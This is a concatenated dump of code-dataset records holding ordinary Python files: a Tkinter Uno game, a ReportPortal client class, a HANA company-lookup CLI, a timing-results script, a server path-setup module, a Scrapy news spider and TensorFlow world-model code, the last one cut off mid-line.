\r\n self.yVal = int(canvas[\"height\"])/2 + width/2 # rely = 0.5\r\n self.draw(7, bulk=True)\r\n \r\n def visualiseHand(self, handSize, time=200): # Visualisation\r\n if self.num <= 2: # Top or bottom. Alter x-axis per card.\r\n xVal = self.xVal - (handSize * game.deck.cardWidth / 2)\r\n xInc = game.deck.cardWidth\r\n yVal = self.yVal\r\n yInc = 0\r\n else: # Left or right. Alter y-axis per card\r\n xVal = self.xVal\r\n xInc = 0\r\n yVal = self.yVal - (handSize * game.deck.cardWidth /2)\r\n yInc = game.deck.cardWidth\r\n for i in range(handSize):\r\n self.hand[i].animating = True # Prevent animation being intervened with\r\n animateWidgetMovement(self.hand[i].main, xVal+(i*xInc), yVal+(i*yInc), time)\r\n root.after(time, self.hand[i].toggleUp, False) # Disables animating\r\n\r\n def draw(self, amount=1, bulk=False):\r\n time = 100\r\n try:\r\n for i in range(amount):\r\n if len(game.deck.cards) == 0:\r\n game.log.output(\"Deck out of cards. Shuffling used pile into deck!\")\r\n game.deck.remakeDeck()\r\n self.hand.append(game.deck.cards.pop(0))\r\n canvas.itemconfig(self.hand[-1].main, state=\"normal\")\r\n if self.num == 1: # Bottom\r\n self.hand[-1].Normal() \r\n elif self.num == 2: # Top\r\n self.hand[-1].Reverse()\r\n elif self.num == 4: # Left\r\n self.hand[-1].LeftToCentre()\r\n else: # Right\r\n self.hand[-1].RightToCentre()\r\n if not bulk:\r\n delay = 300*i\r\n else:\r\n delay = time*(i+(self.num-1)*amount)\r\n root.after(delay, self.visualiseHand, len(self.hand), time)\r\n if amount == 1:\r\n game.log.output(f\"{self.name} drew 1 card\")\r\n elif amount > 0:\r\n game.log.output(f\"{self.name} drew {amount} cards\")\r\n if bulk and self.num == game.playerCount:\r\n root.after(delay+time, game.deck.createUsedPile)\r\n except Exception as e:\r\n game.log.output(f\"{self.name} failed to draw {amount} total cards \\n\\n {e}\", error=True)\r\n\r\n def botPlay(self):\r\n #game.log.output(f\"{self.name} invoked botPlay\")\r\n usableCards = []\r\n colours = []\r\n wild4Present = False\r\n wild4Allowed = True\r\n delay = 0\r\n for cardObj in self.hand:\r\n # Make a list of usable cards in hand\r\n if cardObj.isUsable():\r\n usableCards.append(cardObj)\r\n if cardObj.name == \"Wild_Draw\":\r\n wild4Present = True\r\n # Make a list of colours in hand\r\n if cardObj.cardType != \"Wild\":\r\n colours.append(cardObj.colour)\r\n\r\n # If no usable cards, draw a card. If that can be used, use it.\r\n if len(usableCards) == 0:\r\n self.draw()\r\n if self.hand[-1].isUsable():\r\n usableCards.append(self.hand[-1])\r\n delay = 300 # Allows the draw animation to occur\r\n # Confirm whether wild draw 4 is legal (auto-legal if it's the only card in hand, hence \"elif\" instead of \"if\")\r\n elif wild4Present and game.deck.lastCardUsed.colour in colours:\r\n wild4Allowed = False\r\n\r\n # Pick a random legal card from usableCards, if any cards left\r\n if len(usableCards) > 0:\r\n card = choice(usableCards)\r\n while card.name == \"Wild_Draw\" and not wild4Allowed:\r\n card = choice(usableCards)\r\n root.after(delay, self.botUse, card, colours) # Allows the draw animation to occur, if necessary\r\n else: # No playable card, end turn\r\n game.incTurn()\r\n \r\n def botUse(self, card, colours):\r\n if len(self.hand) == 2 and not game.uno: # Need to \"say\" UNO\r\n game.toggleUno()\r\n card.use(self)\r\n if card.name.find(\"Wild\") > -1 and len(self.hand) > 0:\r\n if len(colours) > 0:\r\n game.changeWildColour(None, colours)\r\n else:\r\n game.changeWildColour(None)\r\n \r\n \r\nclass CustomText(Text):\r\n def __init__(self, *args, **kwargs):\r\n Text.__init__(self, *args, **kwargs)\r\n\r\n def highlight_pattern(self, pattern, tag, start=\"1.0\", end=\"end\", regexp=False):\r\n self.mark_set(\"matchStart\", self.index(start))\r\n self.mark_set(\"matchEnd\", self.index(start))\r\n self.mark_set(\"searchLimit\", self.index(end))\r\n\r\n count = IntVar()\r\n while True:\r\n index = self.search(pattern, \"matchEnd\", \"searchLimit\", count=count, regexp=regexp)\r\n if index == \"\": break\r\n self.mark_set(\"matchStart\", index)\r\n self.mark_set(\"matchEnd\", \"%s+%sc\" % (index, count.get()))\r\n self.tag_add(tag, \"matchStart\", \"matchEnd\")\r\n \r\nclass Log():\r\n def __init__(self):\r\n widthVal = 301\r\n heightVal = 612\r\n self.frame = Frame(root, width=widthVal, height=heightVal, bg=col)\r\n self.frame.place(x=10, rely=0.5, anchor=\"w\")\r\n self.main = CustomText(self.frame, width=33, height=32, state=\"disabled\", wrap=WORD, bg=\"grey\", fg=\"white\", font=(\"ArialBold\", 13))\r\n self.main.place(x=0,y=0)\r\n self.main.tag_configure(\"error\", background=\"yellow\", foreground = \"red\")\r\n self.lastLineAppearedTwice = False # Can be done w/o variable, but this way is mentally easier and takes less code\r\n\r\n def output(self, msg, error=False):\r\n self.main[\"state\"] = \"normal\"\r\n # If same message, add \"x\" number to end of last line. Else add new line.\r\n if self.main.get(\"end-2l\", \"end-2l lineend\").find(msg) > -1:\r\n if not self.lastLineAppearedTwice: # Just add \"x2\"\r\n self.main.insert(\"end-2l lineend\", \" x2\")\r\n else: # Remove & record characters until reach the \"x\"\r\n lastLine = self.main.get(\"end-2l\", \"end-2l lineend\")\r\n # Reverse line, get number, reverse number back to normal\r\n number = lastLine[::-1][:lastLine[::-1].find(\"x\")][::-1]\r\n self.main.delete(f\"end-{len(number)+2}c\", \"end-2l lineend\")\r\n self.main.insert(\"end-2l lineend\", str(int(number)+1))\r\n self.lastLineAppearedTwice = True\r\n else:\r\n self.lastLineAppearedTwice = False\r\n self.main.insert(END, \"- \" + str(msg) + \"\\n\")\r\n for plr in game.players: # Colour code names\r\n self.main.highlight_pattern(plr.name, f\"PlayerNum{plr.num}\", start=\"end-2l\")\r\n if error: # Highlight error line\r\n self.main.highlight_pattern(self.main.get(\"end-4l\", \"end-2l lineend\"), \"error\", start=\"end-4l\")\r\n self.main.insert(\"end-4l+2c\", \"ERROR: \")\r\n self.main[\"state\"] = \"disabled\"\r\n self.main.see(\"end\") # end-2l lineend gives a headache when playing\r\n\r\n def update(self):\r\n for plr in game.players:\r\n self.main.highlight_pattern(plr.name, f\"PlayerNum{plr.num}\")\r\n\r\nclass Game(): \r\n def __init__(self):\r\n self.players = []\r\n self.started = False\r\n self.skipNext = False\r\n self.uno = False\r\n self.pickingColour = False\r\n self.playerCount = 2\r\n self.turnList = []\r\n self.turnNumber = 0\r\n self.increment = 1\r\n self.botDelay = 1000\r\n self.firstGame = True\r\n\r\n # Title screen widgets\r\n width = int(canvas[\"width\"])\r\n height = int(canvas[\"height\"])\r\n \r\n self.title = canvas.create_image(width/2, height/3, image=images[\"UNO\"])\r\n self.playButton = canvas.create_image(width/2, height//1.4, image=images[\"Start\"])\r\n canvas.tag_bind(self.playButton, \"<1>\", self.hideTitleScreen)\r\n\r\n # Choosing player count screen widgets\r\n self.playerCountLabel = canvas.create_text(width/2 , height/5, text=\"Choose player count of \", font=(\"Arial\", 50), fill=\"white\", state=\"hidden\")\r\n\r\n self.player2Background = canvas.create_image(width/3, height/2, image=images[\"Red\"], state=\"hidden\")\r\n self.player3Background = canvas.create_image(width/2, height/2, image=images[\"Green\"], state=\"hidden\")\r\n self.player4Background = canvas.create_image(width/3*2, height/2, image=images[\"Blue\"], state=\"hidden\")\r\n\r\n self.player2Label = canvas.create_text(width/3, height/2, text=\"2\", state=\"hidden\", font=(\"Arial\", 50))\r\n self.player3Label = canvas.create_text(width/2, height/2, text=\"3\", state=\"hidden\", font=(\"Arial\", 50))\r\n self.player4Label = canvas.create_text(width/3*2, height/2, text=\"4\", state=\"hidden\", font=(\"Arial\", 50))\r\n\r\n self.playerCountWidgets = {\r\n \"label\": self.playerCountLabel,\r\n \"2bg\": self.player2Background, \"3bg\": self.player3Background, \"4bg\": self.player4Background,\r\n \"2label\": self.player2Label, \"3label\": self.player3Label, \"4label\": self.player4Label\r\n }\r\n \r\n for k, widget in self.playerCountWidgets.items():\r\n if k != \"label\":\r\n canvas.tag_bind(widget, \"<1>\", self.playerCountButtonClicked)\r\n\r\n\r\n def playerCountButtonClicked(self, event):\r\n for k, widget in self.playerCountWidgets.items():\r\n if widget == canvas.find_withtag(CURRENT)[0]:\r\n self.real_init(int(k[0]))\r\n \r\n def real_init(self, playerCount):\r\n # Hide widgets related to choosing player count\r\n for k, widget in self.playerCountWidgets.items():\r\n canvas.itemconfig(widget, state=\"hidden\")\r\n \r\n # Place & shuffle deck\r\n self.deck.main.place(relx=0.5, rely=0.5, anchor=\"w\")\r\n self.deck.shuffle()\r\n \r\n # Make all cards visible in advance\r\n for cardObj in self.deck.cards:\r\n canvas.itemconfig(cardObj.main, state=\"normal\")\r\n # Just in case, re-move card objects in advance\r\n canvas.coords(cardObj.main,int(canvas[\"width\"])/2+self.deck.cardWidth, int(canvas[\"height\"])/2) \r\n canvas.itemconfig(cardObj.main, image=cardObj.storedImage)\r\n # Clear log\r\n self.log.main.delete(1.0, \"END\")\r\n \r\n # Create players\r\n self.playerCount = playerCount\r\n playerHighlights = [\"red3\",\"CadetBlue3\", \"DarkGoldenRod2\", \"plum3\"]\r\n self.user = Player(\"Player1\", 1, playerHighlights[0])\r\n self.players.append(self.user)\r\n for i in range(1, self.playerCount):\r\n self.players.append(Player(f\"Computer{i}\", i+1, playerHighlights[i]))\r\n self.log.update()\r\n\r\n # Alter turnList to maintain a clockwise playing motion (yes, it's actually anti-clockwise)\r\n if self.playerCount == 2:\r\n self.turnList = self.players\r\n else:\r\n self.turnList = [self.user, self.players[2], self.players[1]]\r\n self.players[2].name, self.players[1].name = self.players[1].name, self.players[2].name\r\n self.players[2].colour, self.players[1].colour = self.players[1].colour, self.players[2].colour\r\n if self.playerCount == 4:\r\n self.turnList.append(self.players[3])\r\n \r\n # Show uno button\r\n canvas.itemconfig(self.unoButton, state=\"normal\")\r\n # Bind motion\r\n canvas.bind(\"\", motion)\r\n\r\n def toggleUno(self, event=None):\r\n self.uno = not self.uno\r\n if self.uno:\r\n self.log.output(f\"Uno status toggled on\")\r\n else:\r\n self.log.output(\"Uno status toggled off\")\r\n \r\n def incTurn(self):\r\n # Proceed to next \"player\"'s turn\r\n self.turnNumber += self.increment\r\n self.uno = False\r\n # Allow turn skips\r\n if self.skipNext:\r\n # Simplify turn number\r\n self.simplifyTurnNumber()\r\n # Skip turn\r\n self.log.output(f\"{self.turnList[self.turnNumber].name} had their turn skipped!\")\r\n self.turnNumber += self.increment\r\n self.skipNext = False\r\n # Simplify turn number\r\n self.simplifyTurnNumber()\r\n # Let computer play turn\r\n game.log.output(f\"{self.turnList[self.turnNumber].name}'s turn!\")\r\n if self.turnNumber != 0:\r\n root.after(self.botDelay, self.turnList[self.turnNumber].botPlay)\r\n\r\n def simplifyTurnNumber(self, alter=True, offset=0):\r\n num = self.turnNumber + offset\r\n while num >= self.playerCount:\r\n num -= self.playerCount\r\n # For negative increments, make sure it's at least zero\r\n while num < 0:\r\n num += self.playerCount\r\n if alter:\r\n self.turnNumber = num\r\n else:\r\n return num\r\n \r\n def changeWildColour(self, event, colours=[\"Red\", \"Green\", \"Blue\", \"Yellow\"]):\r\n toggleColourPicker(\"hidden\")\r\n colour = \"\"\r\n if event: # Was clicked (by a player), pick chosen colour\r\n for key, obj in colourPicker.items():\r\n if canvas.find_withtag(CURRENT)[0] == obj:\r\n colour = key\r\n else: # Bot chooses\r\n colour = choice(colours)\r\n self.deck.lastCardUsed.colour = colour\r\n game.log.output(f\"{self.turnList[self.turnNumber].name} has picked the colour {colour}\")\r\n game.pickingColour = False\r\n if event and not game.started: # Triggered by wild being first discarded card\r\n game.started = True\r\n for cardObj in game.user.hand:\r\n cardObj.animating = False\r\n else:\r\n self.incTurn()\r\n\r\n def displayTitleScreen(self, restart=False):\r\n if restart:\r\n # Reset Variables\r\n game.started = False\r\n self.skipNext = False\r\n self.uno = False\r\n self.pickingColour = False\r\n self.turnList = []\r\n self.turnNumber = 0\r\n self.increment = 1\r\n self.firstGame = False\r\n # Unbind motion event\r\n canvas.unbind(\"\")\r\n # Empty player list\r\n for i in game.players:\r\n del game.players[0]\r\n game.players = []\r\n else:\r\n # Create log and deck for first time\r\n self.log = Log()\r\n self.deck = Deck()\r\n # Create uno button\r\n self.unoButton = canvas.create_image(int(canvas[\"width\"])/2+self.deck.cardWidth, int(canvas[\"height\"])/2+1.25*(self.deck.cardHeight), image=images[\"UNO_Button\"], state=\"hidden\")\r\n canvas.tag_bind(self.unoButton, \"<1>\", self.toggleUno)\r\n\r\n # Display title screen\r\n canvas.itemconfig(self.playButton, state=\"normal\")\r\n canvas.itemconfig(self.title, state=\"normal\")\r\n\r\n def hideTitleScreen(self, event):\r\n # Hide title screen\r\n canvas.itemconfig(self.playButton, state=\"hidden\")\r\n canvas.itemconfig(self.title, state=\"hidden\")\r\n\r\n # Display widgets related to picking player count\r\n for k, widget in self.playerCountWidgets.items():\r\n canvas.itemconfig(widget, state=\"normal\")\r\n\r\n \r\n\r\ndef animateWidgetMovement(label, finalX, finalY, time):\r\n baseX = canvas.coords(label)[0]\r\n baseY = canvas.coords(label)[1]\r\n deltaX = finalX-baseX\r\n deltaY = finalY-baseY\r\n \r\n duration = int(time)\r\n # Animate movement\r\n for i in range(1, duration + 1):\r\n root.after(int(i*(time/duration)), canvas.coords, label, baseX+i*(deltaX/duration), baseY+i*(deltaY/duration))\r\n\r\n root.after(duration, canvas.coords, label, finalX, finalY) # Make sure it reaches the final destination\r\n \r\ndef motion(event):\r\n if not game.started: return\r\n # Animates movement of cards in hand when hovered over by the user\r\n item = canvas.find_withtag(CURRENT)\r\n for cardObj in game.user.hand:\r\n if len(item) > 0 and cardObj.main == item[0]:\r\n # By splitting the if statements, prevents the elif from taking place when not wanted.\r\n if not cardObj.up:\r\n cardObj.animateUp()\r\n elif cardObj.up:\r\n cardObj.animateDown()\r\n\r\ndef toggleColourPicker(newState):\r\n for k, obj in colourPicker.items():\r\n canvas.itemconfigure(obj, state=newState)\r\n \r\ngame = Game()\r\ngame.displayTitleScreen()\r\n\r\nfor k, obj in colourPicker.items():\r\n canvas.tag_bind(obj,\"<1>\", game.changeWildColour)\r\n","sub_path":"Uno (Revamped).py","file_name":"Uno (Revamped).py","file_ext":"py","file_size_in_byte":31654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19664082","text":"\"\"\"\nThis module contains functional for Child RP test items management.\n\nCopyright (c) 2018 http://reportportal.io .\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom weakref import proxy\n\nfrom reportportal_client.core.rp_requests import ItemStartRequest\nfrom reportportal_client.items.rp_test_items.rp_base_test_item import \\\n RPBaseTestItem\n\n\nclass RPChildTestItem(RPBaseTestItem):\n \"\"\"This model stores attributes for RP child test items.\"\"\"\n\n def __init__(self, rp_url, session, project_name, parent_item,\n item_name, item_type, launch_uuid, generated_id,\n **kwargs):\n \"\"\"Initialize instance attributes.\n\n :param rp_url: report portal url\n :param session: Session object\n :param project_name: RP project name\n :param item_name: RP item name\n :param item_type: Type of the test item. Allowable values: \"suite\",\n \"story\", \"test\", \"scenario\", \"step\",\n \"before_class\", \"before_groups\", \"before_method\",\n \"before_suite\", \"before_test\", \"after_class\",\n \"after_groups\", \"after_method\", \"after_suite\",\n \"after_test\"\n :param launch_uuid: Parent launch UUID\n :param generated_id: Id generated to speed up client\n :param kwargs: Dict of additional named parameters\n \"\"\"\n super(RPChildTestItem, self).__init__(rp_url, session,\n project_name, item_name,\n item_type, launch_uuid,\n generated_id, **kwargs)\n self.parent_item = proxy(parent_item)\n self.parent_item.add_child_item(self)\n self.weight = self.parent_item.weight + 1\n\n def start(self, api_version, start_time):\n \"\"\"Create request object to start child test item.\n\n :param api_version: RP API version\n :param start_time: Test item start time\n \"\"\"\n endpoint = \"{url}/{api_version}/{project_name}/item/\" \\\n \"{parentItemUuid}\". \\\n format(url=self.rp_url, api_version=api_version,\n project_name=self.project_name,\n parentItemUuid=self.parent_item.uuid)\n\n self.add_request(endpoint, self.session.post, ItemStartRequest,\n self.item_name, start_time,\n self.item_type, self.launch_uuid,\n attributes=self.attributes, code_ref=self.code_ref,\n description=self.description,\n has_stats=self.has_stats,\n parameters=self.parameters,\n retry=self.retry, uuid=self.uuid,\n unique_id=self.unique_id)\n","sub_path":"reportportal_client/items/rp_test_items/rp_child_test_item.py","file_name":"rp_child_test_item.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"73027315","text":"import os\nimport pyhdb\nimport click\nfrom cli_helpers.tabular_output import TabularOutputFormatter\nfrom dotenv import load_dotenv\nfrom common.utils import timer\nfrom ast import literal_eval\n\n\nload_dotenv()\n\n\nclass DBObj:\n def __init__(self, prefix):\n self.host = os.getenv('%s_db_host' % prefix)\n self.port = os.getenv('%s_db_port' % prefix)\n self.username = os.getenv('%s_db_username' % prefix)\\\n if os.getenv('%s_db_username' % prefix)\\\n else os.getenv('%s_db_username' % 'default')\n self.pwd = os.getenv('%s_db_pwd' % prefix)\\\n if os.getenv('%s_db_pwd' % prefix)\\\n else os.getenv('%s_db_pwd' % 'default')\n\n def __repr__(self):\n return '' % (self.host, self.port)\n\n\nclass WhichDB:\n envlist = []\n envprefix = ['autocand', 'cand']\n headers = ['id', 'name', 'pool', 'schema']\n\n def __init__(self, searchkey):\n for env in self.envprefix:\n self.envlist.append(DBObj(env))\n self.searchkey = searchkey.lower()\n\n def _get_companies_info(self, dbcon):\n '''\n connect to db use db info, search table sf_companies and return all\n companies info, temporary, the info contains:\n comany_id, company_name and oracle_pool_id\n '''\n sql = '''select\n company_id,\n company_name,\n oracle_pool_id,\n company_schema\n from sf_companies\n where lower(company_id) like '%%%s%%';\n ''' % self.searchkey\n\n connection = pyhdb.connect(\n host=dbcon.host, port=dbcon.port,\n user=dbcon.username, password=dbcon.pwd)\n cursor = connection.cursor()\n cursor.execute(sql)\n records = cursor.fetchall()\n connection.close()\n return records\n\n @timer\n def query_all_pool(self):\n data = []\n for dbcon in self.envlist:\n ret = self._get_companies_info(dbcon)\n data.extend(ret)\n return data\n\n def print_search_result(self, data):\n formatter = TabularOutputFormatter(format_name='ascii')\n companys = formatter.format_output(data, self.headers)\n for row in companys:\n print(row)\n\n def is_file_contains_search_key(self, fpath, searchkey):\n '''\n inorder to keep search logic same with sql query. read file content and\n low case it then search.\n '''\n lines = self.get_cached_file_content(fpath)\n if lines:\n for line in lines:\n if searchkey in line.lower():\n return True\n\n return False\n\n def get_cached_file_content(self, fpath):\n with open(fpath, 'r') as file:\n return file.readlines()\n\n\n@click.command()\n@click.argument('searchkey')\ndef main(searchkey):\n \"\"\"\n \\b\n DESCRIPTION\n Show db pool info of the companies you searched.\n SAMPLES\n whichdb htPLTUP11\\n\n show db info contains key words 'htpltup'.\\n\n \"\"\"\n # check cache first, if not records in cache, connect db to fetch records.\n fpath = os.path.join(os.getenv('cache_folder'), 'whichdb.txt')\n wdb = WhichDB(searchkey)\n if os.path.exists(fpath) and\\\n wdb.is_file_contains_search_key(fpath, searchkey):\n # print matched in file\n lines = wdb.get_cached_file_content(fpath)\n data = [literal_eval(sub) for sub in lines if searchkey in sub.lower()]\n wdb.print_search_result(data)\n else:\n data = wdb.query_all_pool()\n if data:\n wdb.print_search_result(data)\n # query all companies and cache to file\n wdb.searchkey = ''\n data = wdb.query_all_pool()\n with open(fpath, 'w') as file:\n file.write(\n '\\n'.join(\n \"('%s','%s','%s','%s')\" % tup for tup in data))\n else:\n print('Warning: no such company exit!!!\\n\\\n script has run against [%s] \\\n and no company found.' % wdb.envprefix)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hana/whichdb.py","file_name":"whichdb.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550786015","text":"\nfor name in ['mini', 'small', 'medium', 'large', 'extra']:\n time_test = []\n for i in range(1, 5):\n time_test.append([])\n for k in range(1, 4):\n with open('./{name}_out/{name}{i}_{k}.txt'.format(name=name, i=i, k=k), 'r') as f:\n for line in f:\n if 'Time in seconds = ' in line:\n x = eval(line.split(' = ')[1])\n time_test[i - 1].append(x)\n break\n time_test[i - 1].append(sum(time_test[i - 1]) / 3)\n print(time_test)\n for i in range(0, 3):\n with open('results/{name}{i}.txt'.format(name=name, i=i), 'w') as f:\n res = \"\"\n for j in range(0, 4):\n print(i, j)\n res += str(j + 1) + '\\t' + str(time_test[j][i]) + '\\n'\n f.write(res)\n","sub_path":"OpenMP/BlueGene/collect_info.py","file_name":"collect_info.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433085330","text":"# -*- coding: utf-8 -*-\n\n# 检测运行环境和相对定位文件路径\n\nimport os\nimport platform\nimport sys\n\n__all__ = ['PATH_APP_ROOT', 'PATH_LOG', 'PATH_CONF', 'PATH_DATA', 'DEV_MODE']\n\nPATH_LOG = ''\nPATH_CONF = ''\nPATH_DATA = ''\nDEV_MODE = False\n\n# 将Python安装的扩展库移除,避免开发调试与正式发布所依赖的库文件不一致导致发布出去的版本无法运行\nx = []\nfor p in sys.path:\n if p.find('site-packages') != -1 or p.find('dist-packages') != -1:\n x.append(p)\nfor p in x:\n sys.path.remove(p)\n\nPLATFORM = platform.system().lower()\nif PLATFORM not in ['windows', 'linux']:\n sys.exit(1)\n\nBITS = 'x64'\nif '32bit' == platform.architecture()[0]:\n BITS = 'x86'\n\npath_of_this_file = os.path.abspath(os.path.dirname(__file__))\nPATH_APP_ROOT = os.path.abspath(os.path.join(path_of_this_file, '..'))\n\n# 如果没有打包,可能是开发版本,也可能是发布源代码版本,需要进一步判断\nif os.path.exists(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'etc')):\n DEV_MODE = True\nelif os.path.exists(os.path.join(PATH_APP_ROOT, '..', '..', 'etc')):\n DEV_MODE = False\nelse:\n print('invalid installation.\\n')\n sys.exit(1)\n\n\nif DEV_MODE:\n # 开发调试模式\n _ext_path = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-common'))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n _ext_path = os.path.abspath(\n os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-{}'.format(PLATFORM), BITS))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n PATH_LOG = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'log'))\n PATH_CONF = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'etc'))\n PATH_DATA = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'share', 'data'))\n\nelse:\n _ext_path = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-common'))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n _ext_path = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', 'packages', 'packages-{}'.format(PLATFORM), BITS))\n if _ext_path not in sys.path:\n sys.path.append(_ext_path)\n\n PATH_LOG = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'log'))\n PATH_CONF = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'etc'))\n PATH_DATA = os.path.abspath(os.path.join(PATH_APP_ROOT, '..', '..', 'data'))\n","sub_path":"server/www/teleport/app/eom_env.py","file_name":"eom_env.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550352233","text":"import scrapy\n\nfrom uavnews.items import UavnewsItem\n\nclass ttaviationSpider(scrapy.Spider):\n name = \"ttaviation\"\n allowed_domains = [\"ttaviation.com\"]\n start_urls = [\n \"http://www.ttaviation.com/h-col-121.html\"\n ]\n\n def parse(self, response):\n for sel in response.xpath('//div[contains(@class, \"J_newsListLine\")]'):\n item = UavnewsItem()\n item['title'] = sel.xpath('.//a//text()').extract()[0]\n item['link'] = \"http://www.ttaviation.com/\" + sel.xpath('.//a/@href').extract()[1] \n item['desc'] = sel.xpath('.//p/text()').extract()[0]\n item['date'] = sel.xpath('.//div[@id=\"verticalStyleYearandMonth\"]/text()').extract()[0] + \"/\"+ sel.xpath('.//div[@id=\"verticalStyleDay\"]/text()').extract()[0]\n item['source'] = 'ttaviation'\n yield item\n","sub_path":"uavnews/spiders/ttaviation_spider.py","file_name":"ttaviation_spider.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"476989085","text":"import tensorflow as tf\nfrom tensorflow.keras.mixed_precision import experimental as prec\n\nimport networks\nimport tools\n\n\nclass WorldModel(tools.Module):\n\n def __init__(self, step, config):\n self._step = step\n self._config = config\n self.encoder = networks.ConvEncoder(\n config.cnn_depth, config.act, config.encoder_kernels)\n self.dynamics = networks.RSSM(\n config.dyn_stoch, config.dyn_deter, config.dyn_hidden,\n config.dyn_input_layers, config.dyn_output_layers,\n config.dyn_rec_depth, config.dyn_shared, config.dyn_discrete,\n config.act, config.dyn_mean_act, config.dyn_std_act,\n config.dyn_temp_post, config.dyn_min_std, config.dyn_cell)\n self.heads = {}\n channels = (1 if config.grayscale else 3)\n shape = config.size + (channels,)\n self.heads['image'] = networks.ConvDecoder(\n config.cnn_depth, config.act, shape, config.decoder_kernels,\n config.decoder_thin)\n if config.pred_discount:\n self.heads['discount'] = networks.DenseHead(\n [], config.discount_layers, config.units, config.act, dist='binary')\n for name in config.grad_heads:\n assert name in self.heads, name\n self._model_opt = tools.Optimizer(\n 'model', config.model_lr, config.opt_eps, config.grad_clip,\n config.weight_decay, opt=config.opt)\n self._scales = dict(\n reward=config.reward_scale, discount=config.discount_scale)\n\n def train(self, data):\n data = self.preprocess(data)\n with tf.GradientTape() as model_tape:\n embed = self.encoder(data)\n post, prior = self.dynamics.observe(embed)\n kl_balance = tools.schedule(self._config.kl_balance, self._step)\n kl_free = tools.schedule(self._config.kl_free, self._step)\n kl_scale = tools.schedule(self._config.kl_scale, self._step)\n\n kl_loss, kl_value = self.dynamics.kl_loss(\n post, prior, self._config.kl_forward, kl_balance, kl_free, kl_scale)\n losses = {}\n likes = {}\n for name, head in self.heads.items():\n grad_head = (name in self._config.grad_heads)\n feat = self.dynamics.get_feat(post)\n feat = feat if grad_head else tf.stop_gradient(feat)\n pred = head(feat, tf.float32)\n like = pred.log_prob(tf.cast(data[name], tf.float32))\n likes[name] = like\n losses[name] = -tf.reduce_mean(like) * self._scales.get(name, 1.0)\n model_loss = sum(losses.values()) + kl_loss\n model_parts = [self.encoder, self.dynamics] + list(self.heads.values())\n metrics = self._model_opt(model_tape, model_loss, model_parts)\n metrics.update({f'{name}_loss': loss for name, loss in losses.items()})\n metrics['kl_balance'] = kl_balance\n metrics['kl_free'] = kl_free\n metrics['kl_scale'] = kl_scale\n metrics['kl'] = tf.reduce_mean(kl_value)\n metrics['prior_ent'] = self.dynamics.get_dist(prior).entropy()\n metrics['post_ent'] = self.dynamics.get_dist(post).entropy()\n context = dict(\n embed=embed, feat=self.dynamics.get_feat(post),\n kl=kl_value, postent=self.dynamics.get_dist(post).entropy())\n return post, context, metrics\n\n @tf.function\n def preprocess(self, obs):\n dtype = prec.global_policy().compute_dtype\n obs = obs.copy()\n obs['image'] = tf.cast(obs['obs'], dtype) / 255.0 - 0.5\n if 'discount' in obs:\n obs['discount'] *= self._config.discount\n for key, value in obs.items():\n if tf.dtypes.as_dtype(value.dtype) in (\n tf.float16, tf.float32, tf.float64):\n obs[key] = tf.cast(value, dtype)\n return obs\n\n @tf.function\n def video_pred(self, data, initial_frames=10, nenvs=6):\n data = self.preprocess(data)\n total_frames = len(data['image'][0])\n truth = data['image'][:nenvs] + 0.5\n embed = self.encoder(data)\n states, _ = self.dynamics.observe(embed[:nenvs, :])\n recon = self.heads['image'](self.dynamics.get_feat(states)).mode()[:nenvs]\n init = {k: v[:, initial_frames-1] for k, v in states.items()}\n prior = self.dynamics.imagine((nenvs, total_frames-initial_frames), init)\n openl = self.heads['image'](self.dynamics.get_feat(prior)).mode()\n model_recon = recon[:, :] + 0.5\n error_recon = (model_recon - truth + 1) / 2\n model_imagine = tf.concat([recon[:, :initial_frames] + 0.5, openl + 0.5], 1)\n error_imagine = (model_imagine - truth + 1) / 2\n return tf.concat([truth, model_imagine, error_imagine], 2), tf.concat([truth, model_recon, error_recon], 2), (truth, model_imagine), (truth, model_recon)\n\n\nclass ConvGRUClassifier(tools.Module):\n def __init__(self, config, world_model, task, n_classes):\n self._config = config\n self._world_model = world_model\n self._task = task\n self._cell_type = config.dyn_classifer_cell\n if config.dyn_classifer_cell == 'gru':\n print(\"Using GRUCell in the Classifier\")\n self._cell = networks.GRUCell(config.dyn_classifer_cell_units, True)\n else:\n print(\"Using No Cell in the Classifier\")\n self._cell = None\n self._classifier = networks.DenseHead(n_classes, config.classifer_layers, config.units, config.act, 'none')\n kw = dict(wd=config.weight_decay, opt=config.opt)\n self._classifer_opt = tools.Optimizer('classifier', config.classifier_lr, config.opt_eps, config.classifier_grad_clip, **kw)\n if self._task == 1 or self._task == 2:\n self._metric = tools.mAP(n_classes, True)\n else:\n self._metric = 